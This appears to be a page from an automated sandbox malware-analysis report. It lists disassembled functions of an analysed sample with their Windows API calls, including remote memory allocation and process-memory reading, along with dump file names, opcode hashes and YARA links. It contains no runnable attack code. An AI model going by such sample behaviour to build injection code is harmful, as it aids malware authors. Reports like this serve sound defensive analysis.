                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID: @
                                                                • API String ID: 544645111-2766056989
                                                                • Opcode ID: 4ba48963fe63cfc7a1084735c6f125a986aa7040cf86a2d7aa2605daa792cfcc
                                                                • Instruction ID: 6eb07efb5ad6addedb7cb1fda6692e56b51acbaa7be99821a0a902c0d6c18e0e
                                                                • Opcode Fuzzy Hash: 4ba48963fe63cfc7a1084735c6f125a986aa7040cf86a2d7aa2605daa792cfcc
                                                                • Instruction Fuzzy Hash: 8B014B75C0020CEBEF009F90D949BDEBBB4EB01315F0080AAE9156A290D3799B64DF86
                                                                Function 00490AEF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathFindExtensionA.SHLWAPI(I,004909EB,00000000), ref: 00490B00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExtensionFindPath
                                                                • String ID: I
                                                                • API String ID: 1435214930-989058785
                                                                • Opcode ID: d8e6e0478c6c106476cfd3eed9fd5f934159763827cccc3fce9c4a56f1c02cb2
                                                                • Instruction ID: 490a86f9199fb2a723c32d13d0449bbecefbad8ccfea3ccf1e26948052aeddeb
                                                                • Opcode Fuzzy Hash: d8e6e0478c6c106476cfd3eed9fd5f934159763827cccc3fce9c4a56f1c02cb2
                                                                • Instruction Fuzzy Hash: 39F0E930E00304BFDF50AFA49846B6EBBB8EB09304F00402AB908A7181E5759D10975D
                                                                Function 004C88D1 Relevance: 3.4, APIs: 2, Instructions: 387memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000400,00001000,00000040), ref: 004C893F
                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000400,00001000,00000040), ref: 004C89B0
                                                                  • Part of subcall function 0048195B: VirtualQueryEx.KERNEL32(00000000,00000000,00000000,0000001C,?,?,?,?,?,?,?,004815D7,00000000,00000000,00000008,00000001), ref: 004819AA
                                                                  • Part of subcall function 0048195B: ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,00000001), ref: 00481A6C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$Alloc$MemoryProcessQueryRead
                                                                • String ID:
                                                                • API String ID: 1985374412-0
                                                                • Opcode ID: bb30909247dc7bfde2577c6fee3e488af1747ed5fdf8b99aa3b4b54044086547
                                                                • Instruction ID: d5d576bb244552abd0daebc8195b5e8471d7b838843e27f7cf947a62215a1e1d
                                                                • Opcode Fuzzy Hash: bb30909247dc7bfde2577c6fee3e488af1747ed5fdf8b99aa3b4b54044086547
                                                                • Instruction Fuzzy Hash: FCE12AB4A00309AFDF40DF95C8C1FAE7BB4FF19310F14446AEA05AB352D735AA509B66
                                                                Function 0043A058 Relevance: 3.4, APIs: 1, Instructions: 1865COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsWow64Process.KERNEL32(?,00000000), ref: 0043A171
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessWow64
                                                                • String ID:
                                                                • API String ID: 2092917072-0
                                                                • Opcode ID: 5212a08ff060474f4a757daa1f8b56bc25b66de4a5551fa6aa67a74ae486033b
                                                                • Instruction ID: c9c9d6002c463b2ddc451e859978b1fdd8d39d6ee9cc452d94ccfc9351c186f0
                                                                • Opcode Fuzzy Hash: 5212a08ff060474f4a757daa1f8b56bc25b66de4a5551fa6aa67a74ae486033b
                                                                • Instruction Fuzzy Hash: 17E28EB1E403099BEB14DF95D8C6B9DB7B0EB0C304F10502AE609AB386E7799D51CB5A
                                                                Function 004BE6CD Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 336stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000001), ref: 004BE7B2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: [
                                                                • API String ID: 1659193697-784033777
                                                                • Opcode ID: 1d498db6108f5ce5cf27fcf2e51d9992bf005b167fba4a8be8bee5986a0daa84
                                                                • Instruction ID: 3c56a0d11cd2c766c94f5ce059693401d2ef9600e2539bf87b676ab94ee2525e
                                                                • Opcode Fuzzy Hash: 1d498db6108f5ce5cf27fcf2e51d9992bf005b167fba4a8be8bee5986a0daa84
                                                                • Instruction Fuzzy Hash: A8D19970D04208EBEF00DFA6DC85BEEBBB4FF48304F14406AE501B6291D7799A65DB69
                                                                Function 004A23A5 Relevance: 3.3, APIs: 2, Instructions: 255COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlZeroMemory.NTDLL(00000000), ref: 004A243D
                                                                • DeviceIoControl.KERNEL32(?,80002004,00000000), ref: 004A2602
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMemoryZero
                                                                • String ID:
                                                                • API String ID: 3899395806-0
                                                                • Opcode ID: c5c8254d1dbc8a1930e33371473cbf1ecdb35d533f64ed50556c215adafe7ac6
                                                                • Instruction ID: 1379d9694a6a7c4ea619312fcfc19dc4f53adde3b66f966dc6809432d0c6c863
                                                                • Opcode Fuzzy Hash: c5c8254d1dbc8a1930e33371473cbf1ecdb35d533f64ed50556c215adafe7ac6
                                                                • Instruction Fuzzy Hash: 899126B1E4024ADBEF00CF98ECC1B99BBB0FF19314F291065E445AB345D378A920DB26
                                                                Function 004A212F Relevance: 3.2, APIs: 2, Instructions: 223COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlZeroMemory.NTDLL(00000000), ref: 004A21C7
                                                                • DeviceIoControl.KERNEL32(?,80002004,00000000), ref: 004A2316
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMemoryZero
                                                                • String ID:
                                                                • API String ID: 3899395806-0
                                                                • Opcode ID: 607c884730c72063ed2b714dfbec4d9dc4e6aa609eb88cc55c6a30480ce735cd
                                                                • Instruction ID: 88b4dc535986b316ac55f8cef019e0e78d4be10e0f0d0bae5b1f65598a20e6c2
                                                                • Opcode Fuzzy Hash: 607c884730c72063ed2b714dfbec4d9dc4e6aa609eb88cc55c6a30480ce735cd
                                                                • Instruction Fuzzy Hash: 0F8109F1A802469BEF00CF98DCC1B99B7B1EF29314F281465E505AB345D378B921DB22
                                                                Function 004A0B71 Relevance: 3.2, APIs: 2, Instructions: 203COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlZeroMemory.NTDLL(00000000), ref: 004A0BFE
                                                                • DeviceIoControl.KERNEL32(?,80002000,00000000), ref: 004A0D47
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMemoryZero
                                                                • String ID:
                                                                • API String ID: 3899395806-0
                                                                • Opcode ID: e6d29720f8726a3870eb82995d9a15f203cdbcd02084dabca70742d32d79f545
                                                                • Instruction ID: 35bc8e8c98ddc9cbf61918b43a30a19bb70cda46dfdcd6dd4577f225d1740349
                                                                • Opcode Fuzzy Hash: e6d29720f8726a3870eb82995d9a15f203cdbcd02084dabca70742d32d79f545
                                                                • Instruction Fuzzy Hash: BE612DB5E40356ABEB00DF98DCC2B9AB7B0FF19314F241465E505AB341E378A921CB66
                                                                Function 004A0DC9 Relevance: 3.2, APIs: 2, Instructions: 203COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlZeroMemory.NTDLL(00000000), ref: 004A0E56
                                                                • DeviceIoControl.KERNEL32(?,80002000,00000000), ref: 004A0F9F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMemoryZero
                                                                • String ID:
                                                                • API String ID: 3899395806-0
                                                                • Opcode ID: c012b28988d9d13af4ed0f8253a96053f7cbae1a570f75d5d19893bb9216046d
                                                                • Instruction ID: 5e66808fcc8ab702745e81185e264776f6ad8174fcd8f79c1605d4a21e0fc504
                                                                • Opcode Fuzzy Hash: c012b28988d9d13af4ed0f8253a96053f7cbae1a570f75d5d19893bb9216046d
                                                                • Instruction Fuzzy Hash: A7613DB5E40346ABEB00DF98DCC2B9AB7B0FF19314F241465E504AB341E378A921CB66
                                                                Function 0041C12B Relevance: 3.2, APIs: 2, Instructions: 175COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • StrToIntExA.SHLWAPI(?,00000001,00000000), ref: 0041C299
                                                                • StrToIntExA.SHLWAPI(?,00000001,00000000), ref: 0041C317
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08893684b4849ca80dbbad22bd6d067a222633f0fca4871b230be33d54aa9cd9
                                                                • Instruction ID: 72668c46e8eb6fcd3ae1b17f614d488b73c843bb3906d10a4c9054e3b89be4f5
                                                                • Opcode Fuzzy Hash: 08893684b4849ca80dbbad22bd6d067a222633f0fca4871b230be33d54aa9cd9
                                                                • Instruction Fuzzy Hash: 8E517471E40358BBEB00DF95DCC2BAE7774EB18714F1440A5FA04BA382D7755A508B9A
                                                                Function 004C2209 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 163stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000000,00000000), ref: 004C225E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: -
                                                                • API String ID: 1659193697-2547889144
                                                                • Opcode ID: 4a42731ff5698520b666cde0eaa60cc509f57895076ccfd0625658bd3d62fcb8
                                                                • Instruction ID: ac85f96b59c1221f066c0bf1ca88fd8a1bc9f32bbe0cdd95abadec772693d737
                                                                • Opcode Fuzzy Hash: 4a42731ff5698520b666cde0eaa60cc509f57895076ccfd0625658bd3d62fcb8
                                                                • Instruction Fuzzy Hash: DE51E538D04219DBDF989BA4DA48BBEB770FB05305F20456BD811B5251C3FD8A82CB9E
                                                                Function 004509FE Relevance: 3.2, APIs: 2, Instructions: 163COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?), ref: 00450AD0
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00450B97
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 626452242-0
                                                                • Opcode ID: 51fbc00a7369d115f3c0b43c78769c4107f592a6ab683dcd9fa3cc5cde5702f9
                                                                • Instruction ID: 07d93664795d8568802f2aafd7d42c7aabd3c898ac3b96575ab8e3f9936b2e69
                                                                • Opcode Fuzzy Hash: 51fbc00a7369d115f3c0b43c78769c4107f592a6ab683dcd9fa3cc5cde5702f9
                                                                • Instruction Fuzzy Hash: 4B515379940309FBEF109F91DC86F9E7B74EB09305F10406AFE04BA282D7B59A64CB59
                                                                Function 004BA0A6 Relevance: 3.1, APIs: 2, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
